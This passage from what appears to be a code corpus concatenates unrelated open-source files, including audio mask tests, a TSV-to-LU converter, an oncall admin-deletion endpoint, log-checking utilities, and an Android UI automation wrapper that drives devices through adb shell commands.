assert (mask[0, ones[0]] == 1).all()
assert (mask[1, ones[1]] == 1).all()
assert (mask[0, zeros[0]] == 0).all()
assert (mask[1, zeros[1]] == 0).all()
@pytest.mark.parametrize("alignment", [None, "word"])
def test_cut_speakers_features_mask(self, supervisions, alignment):
cut = MonoCut(
"cut",
start=0,
duration=2,
channel=0,
features=Mock(sampling_rate=16000, frame_shift=0.01, num_frames=2000),
supervisions=supervisions,
)
mask = cut.speakers_feature_mask(use_alignment_if_exists=alignment)
if alignment == "word":
ones = [
np.index_exp[list(chain(range(0, 10), range(20, 40)))],
np.index_exp[list(chain(range(60, 80)))],
]
zeros = [
np.index_exp[list(chain(range(10, 20), range(40, 200)))],
np.index_exp[list(chain(range(0, 60), range(80, 200)))],
]
else:
ones = [
np.index_exp[list(chain(range(0, 50)))],
np.index_exp[list(chain(range(60, 80)))],
]
zeros = [
np.index_exp[list(chain(range(50, 200)))],
np.index_exp[list(chain(range(0, 60), range(80, 200)))],
]
assert (mask[0, ones[0]] == 1).all()
assert (mask[1, ones[1]] == 1).all()
assert (mask[0, zeros[0]] == 0).all()
assert (mask[1, zeros[1]] == 0).all()
def test_mixed_cut_audio_mask(self, supervisions):
cut = MonoCut(
"cut",
start=0,
duration=2,
channel=0,
recording=Mock(sampling_rate=16000),
supervisions=supervisions,
)
mixed_cut = cut.append(cut)
mask = mixed_cut.supervisions_audio_mask()
ones = np.index_exp[
list(
chain(
range(0, 8000),
range(9600, 12800),
range(32000, 40000),
range(41600, 44800),
)
)
]
zeros = np.index_exp[
list(
chain(
range(8000, 9600),
range(12800, 32000),
range(40000, 41600),
range(44800, 64000),
)
)
]
assert (mask[ones] == 1).all()
assert (mask[zeros] == 0).all()
def test_mixed_cut_features_mask(self, supervisions):
cut = MonoCut(
"cut",
start=0,
duration=2,
channel=0,
features=Mock(sampling_rate=16000, frame_shift=0.01),
supervisions=supervisions,
)
mixed_cut = cut.append(cut)
mask = mixed_cut.supervisions_feature_mask()
ones = np.index_exp[
list(chain(range(0, 50), range(60, 80), range(200, 250), range(260, 280)))
]
zeros = np.index_exp[
list(chain(range(50, 60), range(80, 200), range(250, 260), range(280, 400)))
]
assert (mask[ones] == 1).all()
assert (mask[zeros] == 0).all()
|
tools/scripts/ChitChatUpdate.py | gamontal/botframework-solutions | 601 | 12653040 | import argparse
import os
import typing
import functools
parser = argparse.ArgumentParser(description='Convert tsv to lu')
parser.add_argument('file',type=str)
parser.add_argument('-s','--source',type=str,default='custom editorial')
parser.add_argument('-o','--out',type=str,default=None)
args = parser.parse_args()
with open(args.file, 'r', encoding='utf-8') as fin:
# skip the header line
lines = fin.readlines()[1:]
class Questions:
def __init__(self, source: str, metadata: str):
self.questions = []
self.source = source
if metadata:
metadata = metadata.split(':')
self.metadatas = [[metadata[0], metadata[1]]]
else:
self.metadatas = []
def WriteToFile(self, fout: typing.IO, answer: str):
def writeLine(*args):
for arg in args:
fout.write(arg)
fout.write('\n')
writeLine('> Source: ', self.source)
writeLine('## ? ', self.questions[0])
for i in range(1, len(self.questions)):
writeLine('- ', self.questions[i])
writeLine()
if self.metadatas:
writeLine('**Filters:**')
for metadata in self.metadatas:
writeLine('- {0} = {1}'.format(metadata[0], metadata[1]))
writeLine()
writeLine('```markdown')
writeLine(answer)
writeLine('```')
writeLine()
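# Illustrative example (hedged; the row below is made up, not from real data): a TSV
# line such as
#   how are you<TAB>Doing great!<TAB>editorial<TAB>intent:chitchat
# is grouped by its answer and emitted roughly as
#   > Source: editorial
#   ## ? how are you
#   **Filters:**
#   - intent = chitchat
#   ```markdown
#   Doing great!
#   ```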
answerToQuestions: typing.Dict[str, Questions] = {}
for line in lines:
line = line.split('\t')
question = line[0]
answer = line[1]
source = line[2].strip() if len(line) >= 3 else args.source
metadata = line[3].strip() if len(line) >= 4 else None
questions = answerToQuestions.setdefault(answer, Questions(source, metadata))
questions.questions.append(question)
print('lines {0} answers {1} questions {2}'.format(len(lines), len(answerToQuestions), sum(len(q.questions) for q in answerToQuestions.values())))
with open(args.out if args.out else args.file + '.qna', 'w', encoding='utf-8') as fout:
for k, v in answerToQuestions.items():
v.WriteToFile(fout, k) |
src/oncall/api/v0/team_admin.py | navoday-91/oncall | 857 | 12653107 | <reponame>navoday-91/oncall
# Copyright (c) LinkedIn Corporation. All rights reserved. Licensed under the BSD-2 Clause license.
# See LICENSE in the project root for license information.
from falcon import HTTPNotFound
from ...auth import login_required, check_team_auth
from ... import db
from ...utils import unsubscribe_notifications, create_audit
from ...constants import ADMIN_DELETED
@login_required
def on_delete(req, resp, team, user):
"""
Delete team admin user. Removes admin from the team if he/she is not a member of any roster.
**Example request:**
.. sourcecode:: http
DELETE /api/v0/teams/team-foo/admins/jdoe HTTP/1.1
:statuscode 200: Successful delete
:statuscode 404: Team admin not found
"""
check_team_auth(team, req)
connection = db.connect()
cursor = connection.cursor()
cursor.execute('''DELETE FROM `team_admin`
WHERE `team_id`=(SELECT `id` FROM `team` WHERE `name`=%s)
AND `user_id`=(SELECT `id` FROM `user` WHERE `name`=%s)''',
(team, user))
deleted = cursor.rowcount
if deleted == 0:
raise HTTPNotFound()
create_audit({'user': user}, team, ADMIN_DELETED, req, cursor)
# Remove user from the team if needed
query = '''DELETE FROM `team_user` WHERE `user_id` = (SELECT `id` FROM `user` WHERE `name`=%s) AND `user_id` NOT IN
(SELECT `roster_user`.`user_id`
FROM `roster_user` JOIN `roster` ON `roster`.`id` = `roster_user`.`roster_id`
WHERE team_id = (SELECT `id` FROM `team` WHERE `name`=%s)
UNION
(SELECT `user_id` FROM `team_admin`
WHERE `team_id` = (SELECT `id` FROM `team` WHERE `name`=%s)))
AND `team_user`.`team_id` = (SELECT `id` FROM `team` WHERE `name` = %s)'''
cursor.execute(query, (user, team, team, team))
if cursor.rowcount != 0:
unsubscribe_notifications(team, user, cursor)
connection.commit()
cursor.close()
connection.close()
|
scripts/checks.py | SymbioticLab/Salus | 104 | 12653129 | #
# Copyright 2019 <NAME> <<EMAIL>>
#
# This file is part of Salus
# (see https://github.com/SymbioticLab/Salus).
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import defaultdict
import re
import pandas
import plotutils as pu
def check_threadpool(path, name='Threadpool'):
pat = re.compile(name + r' (?P<evt>start|end) to run seq (?P<seq>\d+)')
with open(path) as f:
lines = f.readlines()
evts = [pat.search(line).groups() for line in lines if pat.search(line)]
print('evts num: {}'.format(len(evts)))
r = set()
for evt, seq in evts:
if evt == 'start':
r.add(seq)
else:
r.remove(seq)
return r
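# Usage sketch (hedged; 'salus_exec.log' is a placeholder log path):
#
#   leftover = check_threadpool('salus_exec.log')
#   # any seq numbers remaining in `leftover` started on the pool but never finished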
def check_pending_ops(path):
kernels = defaultdict(int)
lines = defaultdict(list)
kernel_type = {}
ptn_st = re.compile(r'''Process node: (?P<node>[^ \[]+) = (?P<kernel>[^\[]+)''')
ptn_ed = re.compile("Propagate outputs for node: (?P<node>.+)")
with open(path) as f:
for line in f:
line = line.rstrip('\n')
m = ptn_st.search(line)
if m:
kernels[m.group('node')] += 1
lines[m.group('node')].append(line)
kernel_type[m.group('node')] = m.group('kernel')
m = ptn_ed.search(line)
if m:
if kernels[m.group('node')] == 0:
raise ValueError("Unknown kernel name: ", m.group('node'), line)
kernels[m.group('node')] -= 1
remaining = [('{}[{}]'.format(k, kernel_type[k]), v) for k, v in kernels.items() if v != 0]
print(remaining)
return remaining, kernel_type, lines
def check_kernel_create(path):
kernels = {}
ptn_create = re.compile(r'''Created kernel: (?P<kernel>\w+) (?P<op>.+)''')
ptn_find = re.compile(r'''Found cached kernel: (?P<kernel>\w+) (?P<op>.+)''')
ptn_delete = re.compile(r'''Deleted kernel: (?P<kernel>\w+) (?P<op>.+)''')
with open(path) as f:
for line in f:
line = line.rstrip('\n')
m = ptn_create.search(line)
if m:
kernels[m.group('kernel')] = m.group('op')
m = ptn_find.search(line)
if m:
addr = m.group('kernel')
if addr not in kernels:
raise ValueError('Found nonexist kernel: ', addr, m.group('op'))
if kernels[addr] != m.group('op'):
raise ValueError('Found kernel changed op: ', addr, kernels[addr], m.group('op'))
m = ptn_delete.search(line)
if m:
addr = m.group('kernel')
if addr not in kernels:
raise ValueError('Delete nonexist kernel: ', addr, m.group('op'))
if kernels[addr] != m.group('op'):
raise ValueError('Delete kernel changed op: ', addr, kernels[addr], m.group('op'))
del kernels[addr]
return kernels
def check_iter_create(path):
iters = defaultdict(list)
ptn_create = re.compile(r'''Created iteration (?P<graphId>\d+) for graph (?P<gh>\w+) in session (?P<sess>\w+)''')
ptn_running = re.compile(r'''Running iteration (?P<sess>\w+):(?P<graphId>\d+)''')
ptn_finish = re.compile(r'''(?P<sess>\w+):(?P<gh>\w+):(?P<graphId>\d+) finish iteration''')
with open(path) as f:
for line in f:
line = line.rstrip('\n')
m = ptn_create.search(line)
if m:
l = iters[m.group('graphId')]
if l and l[-1] != 2:
print('Iteration {} created while it is running'.format(m.group('graphId')))
l.append(0)
m = ptn_running.search(line)
if m:
l = iters[m.group('graphId')]
if l and l[-1] != 0:
print('Iteration {} running while it is not created'.format(m.group('graphId')))
l.append(1)
m = ptn_finish.search(line)
if m:
l = iters[m.group('graphId')]
if l and l[-1] != 1:
print('Iteration {} stopped while it is not running'.format(m.group('graphId')))
l.append(2)
return iters
def check_part_nodes(path):
nodes = defaultdict(list)
# Node 1 in graphHandle=0000000000000001, graphId=1: _SINK = NoOp[]
ptn_node = re.compile(r'''Node (?P<nid>\d+) in graphHandle=(?P<gh>\w+), graphId=(?P<graphId>\d+): (?P<name>[\w/_]+) = (?P<kernel>[^[]+)''')
with open(path) as f:
for line in f:
line = line.rstrip('\n')
m = ptn_node.search(line)
if m:
nodes[m.group('graphId')].append({
'nid': int(m.group('nid')),
'name': m.group('name'),
'kernel': m.group('kernel'),
'gh': m.group('gh')
})
return nodes
def check_mem_alloc(path):
allocs = {}
# TFAllocator called for attributes tensorflow::AllocationAttributes(allocation_will_be_logged=1, no_retry_on_failure=1) of 4194304 bytes of memory at 0x1023e200000 with alignment 32 using allocator GPU_0_smallopt@0x10d9c1b0 with AllocationTicket(2988, device=GPU:0, sess=1e0e80dcd81c1d05)
ptn_alloc = re.compile(r'''^.*TFAllocator called .* of (?P<size>\d+) bytes of memory at (?P<origin>0x[a-f0-9]+) with.*sess=(?P<sess>\w+)\)$''')
# [I] TFAllocator deallocating memory at 0x1021c1a4500 size 37632 using allocator GPU_0_bfc@0x11c82000 with AllocationTicket(3854, device=GPU:0, sess=4f03d23010531445)
ptn_dealloc = re.compile(r'''^.*TFAllocator deallocating memory at (?P<origin>\w+) size (?P<size>\d+) using.*sess=(?P<sess>\w+)\)$''')
with pu.pbopen(path) as f:
for line in f:
line = line.rstrip('\n')
m = ptn_alloc.search(line)
if m:
origin = int(m.group('origin'), 16)
size = int(m.group('size'))
allocs[origin] = {
'origin': origin,
'size': size,
'sess': m.group('sess')
}
m = ptn_dealloc.search(line)
if m:
origin = int(m.group('origin'), 16)
size = int(m.group('size'))
if origin not in allocs:
raise ValueError('Unknown deallocation: ' + line)
if allocs[origin]['size'] != size:
raise ValueError('Mismatch size' + line)
del allocs[origin]
return allocs
|
deprecated/benchmark/collective/utils/timer.py | hutuxian/FleetX | 170 | 12653134 | <gh_stars>100-1000
#copyright (c) 2019 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
import time
class BenchmarkTimer(object):
def __init__(self):
self.start_timer_step = 0
self.end_timer_step = 100001
self.cur_step = 0
self.total_time = 0.0
self.step_start = 0.0
def set_start_step(self, step):
self.start_timer_step = step
def time_begin(self):
self.cur_step += 1
if self.cur_step > self.start_timer_step:
self.step_start = time.time()
def time_end(self):
if self.cur_step > self.start_timer_step:
end = time.time()
self.total_time += end - self.step_start
def time_per_step(self):
if self.cur_step <= self.start_timer_step:
return 0.0
return self.total_time / (self.cur_step - self.start_timer_step)
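# Minimal usage sketch (illustrative only; `data_reader` and `train_one_step`
# are placeholders for the caller's own loop):
#
#   timer = BenchmarkTimer()
#   timer.set_start_step(10)      # skip warm-up iterations
#   for batch in data_reader():
#       timer.time_begin()
#       train_one_step(batch)
#       timer.time_end()
#   print(timer.time_per_step())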
|
example/runtests.py | liskin/coveralls-python | 191 | 12653172 | from project import branch
from project import hello
if __name__ == '__main__':
hello()
branch(False, True)
branch(True, True)
|
src/unittest/python/python_utils_tests.py | klr8/pybuilder | 1,419 | 12653221 | <gh_stars>1000+
# -*- coding: utf-8 -*-
#
# This file is part of PyBuilder
#
# Copyright 2011-2020 PyBuilder Team
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from shutil import rmtree
from tempfile import mkdtemp
from pybuilder.python_utils import iglob, makedirs
from pybuilder.utils import jp
class TestPythonGlobTest(unittest.TestCase):
def touch(self, f):
with open(f, "wb") as f:
pass
def setUp(self):
self.tmp_dir = mkdtemp()
makedirs(jp(self.tmp_dir, "a", "b"))
self.touch(jp(self.tmp_dir, "x.py"))
self.touch(jp(self.tmp_dir, "a", "y.py"))
self.touch(jp(self.tmp_dir, "a", "b", "z.py"))
def tearDown(self):
rmtree(self.tmp_dir)
def test_iglob(self):
self.assertEqual(list(iglob(jp(self.tmp_dir, "*.py"))), [jp(self.tmp_dir, "x.py")])
self.assertEqual(list(iglob(jp(self.tmp_dir, "**", "*.py"), recursive=True)),
[jp(self.tmp_dir, "x.py"),
jp(self.tmp_dir, "a", "y.py"),
jp(self.tmp_dir, "a", "b", "z.py")
])
|
ding/utils/tests/test_plot.py | sailxjx/DI-engine | 464 | 12653273 | import random
import numpy as np
import os
import pytest
from ding.utils.plot_helper import plot
@pytest.mark.unittest
def test_plot():
rewards1 = np.array([0, 0.1, 0, 0.2, 0.4, 0.5, 0.6, 0.9, 0.9, 0.9])
rewards2 = np.array([0, 0, 0.1, 0.4, 0.5, 0.5, 0.55, 0.8, 0.9, 1])
rewards = np.concatenate((rewards1, rewards2))  # concatenate the two reward arrays
episode1 = range(len(rewards1))
episode2 = range(len(rewards2))
episode = np.concatenate((episode1, episode2))
data1 = {}
data1['x'] = episode
data1['y'] = rewards
data1['label'] = 'line1'
rewards3 = np.random.random(10)
rewards4 = np.random.random(10)
rewards = np.concatenate((rewards3, rewards4))  # concatenate the two reward arrays
episode3 = range(len(rewards3))
episode4 = range(len(rewards4))
episode = np.concatenate((episode3, episode4))
data2 = {}
data2['x'] = episode
data2['y'] = rewards
data2['label'] = 'line2'
data = [data1, data2]
plot(data, 'step', 'reward_rate', 'test_pic', './pic.jpg')
assert os.path.exists('./pic.jpg')
|
reddit2telegram/channels/~inactive/chessmemesenglish/app.py | CaringCat/reddit2telegram | 187 | 12653285 | #encoding:utf-8
subreddit = 'chessmemes'
t_channel = '@chessmemesenglish'
def send_post(submission, r2t):
return r2t.send_simple(submission)
|
python_uiautomator/device.py | maksonlee/android-uiconductor | 113 | 12653286 | #!/usr/bin/python
#
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""UICD's python tool to execute actions on python script."""
import re
import time
from .android_device_driver import AndroidDeviceDriver
from .constant import DOUBLE_CLICK_POWER_EVENT_TEMPLATE
from .constant import DOUBLE_TAP_EVENT_TEMPLATE
from .constant import INPUT_ACTION_SWITCHER
from .constant import InputActions
from .constant import MotionEvent
from .constant import SWIPE_MATRIX
from .ui_object import UiObject
from .ui_selector import UiSelector
from .uicd_python_util import UICDPythonUtil
from .xml_parser import XmlParser
class Device(object):
"""Device wrapper class for python in uicd.
Attributes:
adb_path: adb path.
xml_dumper_port: port where xml dumper server is running.
base_folder: base folder for xml apk if needed.
android_device_driver: AndroidDeviceDriver for xml fetching.
api_level: API level of current device.
model: model of current device.
dimension_x: x dimension value.
dimension_y: y dimension value.
"""
def __init__(self, device_serial, xml_dumper_port):
uicd_util = UICDPythonUtil()
self.android_device_driver = AndroidDeviceDriver(
uicd_util.get_base_folder(), uicd_util.get_adb_path(), device_serial,
xml_dumper_port)
dump_sys_result = self.android_device_driver.adb.exec_adb_cmd(
"shell dumpsys window displays").communicate()[0].decode("utf-8")
# This handles the case when dumpsys didn't generate any result
if not dump_sys_result:
raise EnvironmentError(
"shell dumpsys window displays result is empty, check your device.")
# This regex is for matching pattern init=48x96 so
# that we can fetch device dimension value.
regex = re.compile("init=[0-9]+x[0-9]+")
match = regex.findall(dump_sys_result)
[self.dimension_x, self.dimension_y
] = list(map(int,
re.sub("[^0-9]", " ", match[0]).split()))
self.api_level = self.android_device_driver.adb.exec_adb_cmd(
"shell getprop ro.build.version.sdk").communicate()[0].decode(
"utf-8").strip()
self.model = self.android_device_driver.adb.exec_adb_cmd(
"shell getprop ro.product.model").communicate()[0].decode(
"utf-8").strip()
self.xml_dumper_port = xml_dumper_port
@classmethod
def create_device_by_slot(cls, slot):
"""Creates device instance by device slot.
Caller need to make sure uicd_util has device and port information first.
Args:
slot: the virtual slot the device is in.
Returns:
A instance of a device.
"""
uicd_util = UICDPythonUtil()
device_serial = uicd_util.get_device_serial(slot)
xml_dumper_port = uicd_util.get_xml_dumper_port(slot)
if device_serial is None or xml_dumper_port is None:
raise TypeError
return cls(device_serial, xml_dumper_port)
@classmethod
def create_device_by_serial(cls, device_serial):
"""Creates device instance by serial.
Args:
device_serial: device serial number
Returns:
A instance of a device.
"""
uicd_util = UICDPythonUtil()
return cls(device_serial,
uicd_util.get_xml_dumper_port_for_device(device_serial))
@classmethod
def create_device_by_serial_and_port(cls, device_serial, xml_dumper_port):
"""Creates device instance by serial and xml dumper port.
Args:
device_serial: device serial number
xml_dumper_port: xml port for the dumper
Returns:
A instance of a device.
"""
return cls(device_serial, xml_dumper_port)
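# Illustrative usage (hedged): the serial and port below are placeholders, and the
# xml dumper service is assumed to be reachable on that port.
#
#   device = Device.create_device_by_serial_and_port("emulator-5554", 9008)
#   device.home()
#   device.text("Settings").click()   # assumes the returned UiObject exposes click()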
def set_xml_fetch_method(self, use_xml_dumper):
"""Sets if xml would be fetched via dumper or adb uiautomator dump.
Please only use this function when you can't install any apk on your device.
Some other functionalities (like drag) are tied to xml dumper apk and using
this will slow down the uiautomation process.
Passing True means xml would be fetched via dumper.
False means xml would be fetched via adb.
Args:
use_xml_dumper: True or False.
"""
self.android_device_driver.use_xml_dumper = use_xml_dumper
def fetch_current_xml(self):
"""Function to fetch current xml.
Returns:
A json string of xml info.
Raises:
OSError: Request is invalid.
"""
return self.android_device_driver.fetch_current_xml()
def text(self, value, match_option=None):
"""Function to invoke UiObject by text.
Args:
value: text value to match.
match_option: option for advanced matching.
Returns:
A UiObject with .text(value).
"""
return self.attributes("text", value, match_option)
def content_desc(self, value, match_option=None):
"""Function to invoke UiObject by description.
Args:
value: content description to match.
match_option: option for advanced matching.
Returns:
A UiObject with .description(value).
"""
return self.attributes("content-desc", value, match_option)
def resource_id(self, value, match_option=None):
"""Function to invoke UiObject by description.
Args:
value: resource id to match.
match_option: option for advanced matching.
Returns:
A UiObject with .resource_id(value).
"""
return self.attributes("resource-id", value, match_option)
def attributes(self, attrib_key, attrib_value, match_option=None):
"""Function to invoke UiObject by description.
Args:
attrib_key: key for which the value should match.
attrib_value: value for matching option
match_option: option for advanced matching.
Returns:
A UiObject with .description(key).
"""
selector = UiSelector()
selector.attributes(attrib_key, attrib_value, match_option)
return UiObject(selector, self.android_device_driver)
def home(self):
"""Function to invoke home button.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.input_key_event(InputActions.HOME)
def click(self, x, y):
"""Function to invoke click on certain place button.
Args:
x: x coordinate for click position.
y: y coordinate for click position.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
# adb click 0,0 will have a weird behavior
if x <= 0 and y <= 0:
return
cmd = "shell input tap {x} {y}".format(x=x, y=y)
self.android_device_driver.adb.exec_adb_cmd(cmd).wait()
def long_click(self, x, y, duration=2000):
"""Function to invoke long click on certain place button.
2000ms by default.
Args:
x: x coordinate for click position.
y: y coordinate for click position.
duration: duration of long click.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.android_device_driver.adb.exec_adb_cmd(
"shell input swipe {x} {y} {x} {y} {duration}".format(
x=x, y=y, duration=duration)).wait()
def rotate_portrait(self):
"""Turns the phone in portrait mode.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.android_device_driver.adb.exec_adb_cmd(
"shell content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:0"
).wait()
def rotate_landscape(self):
"""Turns the phone in landscape mode.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.android_device_driver.adb.exec_adb_cmd(
"shell content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1"
).wait()
def unfreeze_rotation(self):
"""Enables the sensors and unfreezes the device rotation at its current rotation state.
Returns:
Nothing
"""
self.android_device_driver.adb.exec_adb_cmd(
"shell content insert --uri content://settings/system --bind name:s:accelerometer_rotation --bind value:i:1"
).wait()
def freeze_rotation(self):
"""Disables the sensors and freezes the device rotation at its current rotation state.
Returns:
Nothing
"""
self.android_device_driver.adb.exec_adb_cmd(
"shell content insert --uri content://settings/system --bind name:s:accelerometer_rotation --bind value:i:0"
).wait()
def open_settings(self):
"""Opens the settings of the phone.
Returns:
Nothing
"""
self.android_device_driver.adb.exec_adb_cmd(
"shell am start -a android.settings.SETTINGS").wait()
def open_quick_settings(self):
"""Opens the quick settings of the phone.
Returns:
Nothing
"""
self.android_device_driver.adb.exec_adb_cmd(
"shell cmd statusbar expand-settings").wait()
def open_notifications(self):
"""Opens the notifications of the phone.
Returns:
Nothing
"""
self.android_device_driver.adb.exec_adb_cmd(
"shell cmd statusbar expand-notifications").wait()
def close_notifications(self):
"""Closes the notifications of the phone.
Returns:
Nothing
"""
self.android_device_driver.adb.exec_adb_cmd(
"shell cmd statusbar collapse").wait()
def overview(self):
"""Function to invoke overview button.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.input_key_event(InputActions.OVERVIEW)
def back(self):
"""Function to invoke back button.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.input_key_event(InputActions.BACK)
def input_key_event(self, key, custom_key=None):
"""Function to invoke a given input key on device.
Args:
key: key event, value in InputActions.
custom_key: custom key number if used InputActions.CUSTOM
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
key_event = INPUT_ACTION_SWITCHER.get(key)
if key_event == "-1":
key_event = custom_key
self.android_device_driver.adb.exec_adb_cmd("shell input keyevent " +
key_event).wait()
def input_text(self, text):
"""Function to invoke back button.
Args:
text: text to be inputted.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.android_device_driver.adb.exec_adb_cmd("shell input text " +
text).wait()
def swipe_up(self):
"""Function to invoke swipe up.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.swipe_sub(SWIPE_MATRIX[0])
def swipe_down(self):
"""Function to invoke swipe down.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.swipe_sub(SWIPE_MATRIX[1])
def swipe_left(self):
"""Function to invoke swipe left.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.swipe_sub(SWIPE_MATRIX[2])
def swipe_right(self):
"""Function to invoke swipe right.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.swipe_sub(SWIPE_MATRIX[3])
def swipe_custom(self, x1, y1, x2, y2):
"""Function to invoke custom swipe.
Args:
x1: x coordinate for start position.
y1: y coordinate for start position.
x2: x coordinate for end position.
y2: y coordinate for end position.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.android_device_driver.swipe(x1, y1, x2, y2)
def swipe_custom_ratio(self, start_pos_x_ratio, start_pos_y_ratio,
end_pos_x_ratio, end_pos_y_ratio):
"""Function to invoke custom swipe.
Args:
start_pos_x_ratio: x ratio of screen for start position.
start_pos_y_ratio: y ratio of screen for start position.
end_pos_x_ratio: x ratio of screen for end position.
end_pos_y_ratio: y ratio of screen for end position.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
Raises:
OSError: If invalid ratio is provided to this action.
"""
invalid_ratio_tuple = [
start_pos_x_ratio > 1, start_pos_y_ratio > 1, end_pos_x_ratio > 1,
end_pos_y_ratio > 1, start_pos_x_ratio < 0, end_pos_x_ratio < 0,
start_pos_y_ratio < 0, end_pos_y_ratio < 0
]
if any(invalid_ratio_tuple):
raise EnvironmentError(
"Trying to swipe with invalid ratio, Ratio needs to be within 0 - 1.")
self.swipe_sub([
start_pos_x_ratio, start_pos_y_ratio, end_pos_x_ratio,
end_pos_y_ratio
])
def swipe_sub(self, swipe_matrix):
"""Function to invoke swipe.
Args:
swipe_matrix: swipe matrix for swipe action.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
self.android_device_driver.swipe(swipe_matrix[0] * self.dimension_x,
swipe_matrix[1] * self.dimension_y,
swipe_matrix[2] * self.dimension_x,
swipe_matrix[3] * self.dimension_y)
def drag(self, points, steps=None, durations=None):
"""Function to invoke drag.
Args:
points: drag point route, first point is drag start point, the last point
is drop point.
steps: steps for each drag points movement, by default 10 step for each
movement.
durations: duration for each drag points movement, by default 0.1 second
for each movement.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
Raises:
OSError: If less than 2 points provided to drag action.
"""
if durations is None:
durations = [0.1] * (len(points) - 1)
if steps is None:
steps = [10] * (len(points) - 1)
if len(points) < 2:
raise EnvironmentError("Need at least 2 points")
if len(durations) + 1 != len(points):
raise EnvironmentError(
"Durations size should be one less than points size.")
if len(steps) + 1 != len(points):
raise EnvironmentError("Steps size should be one less than points size.")
self.android_device_driver.drag_start(points[0].x, points[0].y)
time.sleep(0.5)
for i in range(len(points) - 1):
startx = points[i].x
starty = points[i].y
endx = points[i + 1].x
endy = points[i + 1].y
disx = (endx - startx) / steps[i]
disy = (endy - starty) / steps[i]
for j in range(steps[i]):
self.android_device_driver.drag_move(startx + disx * j,
starty + disy * j)
time.sleep(durations[i])
self.android_device_driver.drag_stop(points[-1].x, points[-1].y)
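# Example (hedged): `Point` stands for any simple object exposing `x` and `y`
# attributes; a namedtuple works fine.
#
#   from collections import namedtuple
#   Point = namedtuple("Point", "x y")
#   device.drag([Point(100, 800), Point(100, 400), Point(500, 400)])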
def multi_touch(self, points):
"""Function to invoke multi touch.
Args:
points: points of multi touch action
Returns:
Nothing.
Raises:
OSError: If invalid response is received.
"""
if len(points) < 2:
raise EnvironmentError("Need at least 2 points")
self.android_device_driver.send_motion_event(points[0],
MotionEvent.ACTION_DOWN)
medium_points = points[1:-1]
for point in medium_points:
self.android_device_driver.send_motion_event(
point, MotionEvent.ACTION_POINTER_DOWN)
self.android_device_driver.send_motion_event(points[-1],
MotionEvent.ACTION_POINTER_UP)
def wait_for(self, selector, timeout=3, refresh_rate=0.5, retry=0):
"""Function to wait for a selector to show up.
Args:
selector: selectors to wait for.
timeout: how long to wait for in seconds.
refresh_rate: the frequency of refresh in seconds.
retry: the amount of times this action will get repeated.
Returns:
True/false, if the element described by the selector is found.
"""
time_counter = 0
retry_counter = 0
while retry_counter <= retry:
while time_counter <= timeout:
time.sleep(refresh_rate)
time_counter = time_counter + refresh_rate
xml = self.android_device_driver.fetch_current_xml()
parser = XmlParser(xml)
exist = parser.find_first_element_by_selector(selector)
if exist is not None:
return True
retry_counter = retry_counter + 1
return False
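# Example (hedged): wait up to 5 seconds for a node whose text is "OK", then tap it.
#
#   selector = UiSelector().attributes("text", "OK", None)
#   if device.wait_for(selector, timeout=5):
#       device.find_element_by_selector(selector).click()   # click() assumed on UiObject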
def info(self):
"""Function to get basic device info.
Returns:
dict of info, with dimensions, api_level and deviceModel as key.
"""
return {
"dimension_x": self.dimension_x,
"dimension_y": self.dimension_y,
"api_level": self.api_level,
"device_model": self.model,
}
def double_click_power(self):
"""Performs double click power button.
Note: This action only works on rooted devices.
Returns:
Nothing, Subprocess.Popen.wait() should resolve automatically.
"""
get_power_event_cmd = ("getevent -pl 2>&1 | sed -n "
"'/^add/{h}/KEY_POWER/{x;s/[^/]*//p}'")
input_event = self.android_device_driver.adb.exec_adb_cmd(
"shell '{cmd}'".format(cmd=get_power_event_cmd)).communicate()[0]
self.android_device_driver.adb.exec_adb_cmd("shell '{cmd}'".format(
